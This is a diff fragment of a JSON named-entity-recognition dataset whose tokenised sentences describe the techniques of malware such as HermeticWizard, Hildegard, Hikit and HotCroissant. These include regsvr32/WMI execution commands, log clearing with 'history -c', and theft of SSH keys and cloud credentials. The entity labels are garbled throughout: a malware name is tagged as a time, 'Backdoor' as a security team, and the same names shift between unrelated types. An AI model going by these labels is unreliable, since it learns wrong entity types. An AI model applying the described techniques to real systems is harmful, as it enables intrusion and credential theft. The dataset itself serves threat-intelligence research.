"named", + "`exec_32.dll`", + "to", + "mimic", + "a", + "legitimate", + "MS", + "Outlook", + ".dll." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "connect", + "to", + "remote", + "shares", + "using", + "`WNetAddConnection2W`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HermeticWizard", + "has", + "the", + "ability", + "to", + "scan", + "ports", + "on", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "use", + "a", + "list", + "of", + "hardcoded", + "credentials", + "in", + "attempt", + "to", + "authenticate", + "to", + "SMB", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "has", + "used", + "`regsvr32.exe", + "/s", + "/i`", + "to", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "find", + "machines", + "on", + "the", + "local", + "network", + "by", + "gathering", + "known", + "local", + "IP", + "addresses", + "through", + "`DNSGetCacheDataTable`,", + "`GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET,", + "RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`,", + "and", + "`GetAdaptersAddresses.`" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "B-SamFile", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HermeticWizard", + "has", + "the", + "ability", + "to", + "create", + "a", + "new", + "process", + "using", + "`rundll32`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "use", + "a", + "list", + "of", + "hardcoded", + "credentials", + "to", + "to", + "authenticate", + "via", + "NTLMSSP", + "to", + "the", + "SMB", + "shares", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "use", + "`OpenRemoteServiceManager`", + "to", + "create", + "a", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "use", + "`cmd.exe`", + "for", + "execution", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HermeticWizard", + "can", + "use", + "WMI", + "to", + "create", + "a", + "new", + "process", + "on", + "a", + "remote", + "machine", + "via", + "`C:\\windows\\system32\\cmd.exe", + "/c", + "start", + "C:\\windows\\system32\\\\regsvr32.exe", + "/s", + "/iC:\\windows\\<filename>.dll`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "use", + "DNS", + "tunneling", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "decrypt", + "its", + "payload", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "inject", + "a", + "DLL", + "into", + "rundll32.exe", + "for", + "execution." + ], + "ner_tags": [ + "B-HackOrg", + "B-SecTeam", + "O", + "B-Features", + "I-Features", + "B-Way", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "encrypt", + "its", + "payload." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "has", + "the", + "ability", + "to", + "delete", + "folders", + "and", + "files", + "from", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "has", + "the", + "ability", + "to", + "search", + "the", + "compromised", + "host", + "for", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "I-Purp", + "I-Purp", + "I-Purp", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "has", + "been", + "spread", + "through", + "malicious", + "document", + "lures." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "has", + "been", + "named", + "`srvdll.dll`", + "to", + "appear", + "as", + "a", + "legitimate", + "service." + ], + "ner_tags": [ + "B-HackOrg", + "B-SecTeam", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "identify", + "removable", + "media", + "attached", + "to", + "victim's", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "gather", + "process", + "information." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "use", + "spoofed", + "DNS", + "requests", + "to", + "create", + "a", + "bidirectional", + "tunnel", + "between", + "a", + "compromised", + "host", + "and", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "establish", + "persistence", + "with", + "the", + "auto", + "start", + "function", + "including", + "using", + "the", + "value", + "`EverNoteTrayUService`." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "use", + "rundll32.exe", + "to", + "gain", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "enumerate", + "drives", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heyoka", + "Backdoor", + "can", + "check", + "if", + "it", + "is", + "running", + "as", + "a", + "service", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "encrypts", + "C2", + "traffic", + "with", + "TLS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "uses", + "various", + "XOR", + "techniques", + "to", + "obfuscate", + "its", + "components." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "deletes", + "its", + "RAT", + "installer", + "file", + "as", + "it", + "executes", + "its", + "DLL", + "payload", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "has", + "the", + "ability", + "to", + "upload", + "and", + "download", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "creates", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "executes", + "using", + "regsvr32.exe", + "called", + "from", + "the", + "Registry", + "Run", + "Keys", + "/", + "Startup", + "Folder", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "encrypts", + "C2", + "traffic", + "with", + "a", + "double", + "XOR", + "using", + "two", + "distinct", + "single-byte", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Hi-Zor", + "communicates", + "with", + "its", + "C2", + "server", + "over", + "HTTPS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Hi-Zor", + "has", + "the", + "ability", + "to", + "create", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "uses", + "a", + "cipher", + "to", + "implement", + "a", + "decoding", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "adds", + "itself", + "as", + "a", + "shared", + "object", + "to", + "the", + "LD_PRELOAD", + "environment", + "variable." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "encrypts", + "its", + "configuration", + "and", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "downloads", + "a", + "tar", + "compressed", + "archive", + "from", + "a", + "download", + "server", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "creates", + "a", + "user", + "account", + "as", + "a", + "means", + "to", + "provide", + "initial", + "persistence", + "to", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "communicates", + "with", + "a", + "simple", + "network", + "protocol", + "over", + "TCP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "HiddenWasp", + "installs", + "reboot", + "persistence", + "by", + "adding", + "itself", + "to", + "<code>/etc/rc.local</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "uses", + "a", + "rootkit", + "to", + "hook", + "and", + "implement", + "functions", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "uses", + "an", + "RC4-like", + "algorithm", + "with", + "an", + "already", + "computed", + "PRGA", + "generated", + "key-stream", + "for", + "network", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HiddenWasp", + "uses", + "a", + "script", + "to", + "automate", + "tasks", + "on", + "the", + "victim's", + "machine", + "and", + "to", + "assist", + "in", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "has", + "attempted", + "to", + "disable", + "driver", + "signing", + "verification", + "by", + "tampering", + "with", + "several", + "Registry", + "keys", + "prior", + "to", + "the", + "loading", + "of", + "a", + "rootkit", + "driver", + "component." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "has", + "used", + "DLL", + "Search", + "Order", + "Hijacking", + "to", + "load", + "<code>oci.dll</code>", + "as", + "a", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "can", + "upload", + "files", + "from", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "has", + "the", + "ability", + "to", + "download", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "installs", + "a", + "self-generated", + "certificate", + "to", + "the", + "local", + "trust", + "store", + "as", + "a", + "root", + "CA", + "and", + "Trusted", + "Publisher." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "supports", + "peer", + "connections." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Hikit", + "has", + "been", + "spread", + "through", + "spear", + "phishing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "is", + "a", + "Rootkit", + "that", + "has", + "been", + "used", + "by", + "Axiom." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "performs", + "XOR", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Hikit", + "has", + "the", + "ability", + "to", + "create", + "a", + "remote", + "shell", + "and", + "run", + "given", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "an", + "IRC", + "channel", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "history", + "-c", + "to", + "clear", + "script", + "shell", + "logs." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "queried", + "the", + "Cloud", + "Instance", + "Metadata", + "API", + "for", + "cloud", + "credentials." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "was", + "executed", + "through", + "the", + "kubelet", + "API", + "run", + "command", + "and", + "by", + "executing", + "commands", + "on", + "running", + "containers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "masscan", + "to", + "search", + "for", + "kubelets", + "and", + "the", + "kubelet", + "API", + "for", + "additional", + "running", + "containers." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "searched", + "for", + "SSH", + "keys,", + "Docker", + "credentials,", + "and", + "Kubernetes", + "service", + "tokens." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Tool", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "decrypted", + "ELF", + "files", + "with", + "AES." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "modified", + "DNS", + "resolvers", + "to", + "evade", + "DNS", + "monitoring", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "modified", + "/etc/ld.so.preload", + "to", + "intercept", + "shared", + "library", + "import", + "functions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "encrypted", + "an", + "ELF", + "file." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "the", + "BOtB", + "tool", + "that", + "can", + "break", + "out", + "of", + "containers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "the", + "BOtB", + "tool", + "which", + "exploits", + "CVE-2019-5736." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Hildegard", + "was", + "executed", + "through", + "an", + "unsecure", + "kubelet", + "that", + "allowed", + "anonymous", + "access", + "to", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "deleted", + "scripts", + "after", + "execution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "downloaded", + "additional", + "scripts", + "that", + "build", + "and", + "run", + "Monero", + "cryptocurrency", + "miners." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "created", + "a", + "user", + "named", + "“monerodaemon”." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "disguised", + "itself", + "as", + "a", + "known", + "Linux", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "masscan", + "to", + "look", + "for", + "kubelets", + "in", + "the", + "internal", + "Kubernetes", + "network." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "searched", + "for", + "private", + "keys", + "in", + ".ssh." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "established", + "tmate", + "sessions", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "xmrig", + "to", + "mine", + "cryptocurrency." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "modified", + "/etc/ld.so.preload", + "to", + "overwrite", + "readdir()", + "and", + "readdir64()." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "packed", + "ELF", + "files", + "into", + "other", + "binaries." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "collected", + "the", + "host's", + "OS,", + "CPU,", + "and", + "memory", + "information." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "started", + "a", + "monero", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "used", + "shell", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Hildegard", + "has", + "downloaded", + "scripts", + "from", + "GitHub." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "list", + "the", + "names", + "of", + "all", + "open", + "windows", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "encrypted", + "strings", + "with", + "single-byte", + "XOR", + "and", + "base64", + "encoded", + "RC4." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "download", + "files", + "from", + "the", + "infected", + "host", + "to", + "the", + "command", + "and", + "control", + "(C2)", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "clean", + "up", + "installed", + "files,", + "delete", + "files,", + "and", + "delete", + "itself", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "retrieve", + "a", + "list", + "of", + "files", + "in", + "a", + "given", + "directory", + "as", + "well", + "as", + "drives", + "and", + "drive", + "types." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "hide", + "the", + "window", + "for", + "operations", + "performed", + "on", + "a", + "given", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "upload", + "a", + "file", + "from", + "the", + "command", + "and", + "control", + "(C2)", + "server", + "to", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "can", + "perform", + "dynamic", + "DLL", + "importing", + "and", + "API", + "lookups", + "using", + "<code>LoadLibrary</code>", + "and", + "<code>GetProcAddress</code>", + "on", + "obfuscated", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "list", + "running", + "processes", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "attempted", + "to", + "install", + "a", + "scheduled", + "task", + "named", + "“Java", + "Maintenance64”", + "on", + "startup", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "do", + "real", + "time", + "screen", + "viewing", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "stop", + "services", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "can", + "retrieve", + "a", + "list", + "of", + "applications", + "from", + "the", + "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App", + "Paths</code>", + "registry", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "used", + "the", + "open", + "source", + "UPX", + "executable", + "packer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "compressed", + "network", + "communications", + "and", + "encrypted", + "them", + "with", + "a", + "custom", + "stream", + "cipher." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "determine", + "if", + "the", + "current", + "user", + "is", + "an", + "administrator,", + "Windows", + "product", + "name,", + "processor", + "name,", + "screen", + "resolution,", + "and", + "physical", + "RAM", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "identify", + "the", + "IP", + "address", + "of", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "collect", + "the", + "username", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HotCroissant", + "has", + "the", + "ability", + "to", + "retrieve", + "a", + "list", + "of", + "services", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + 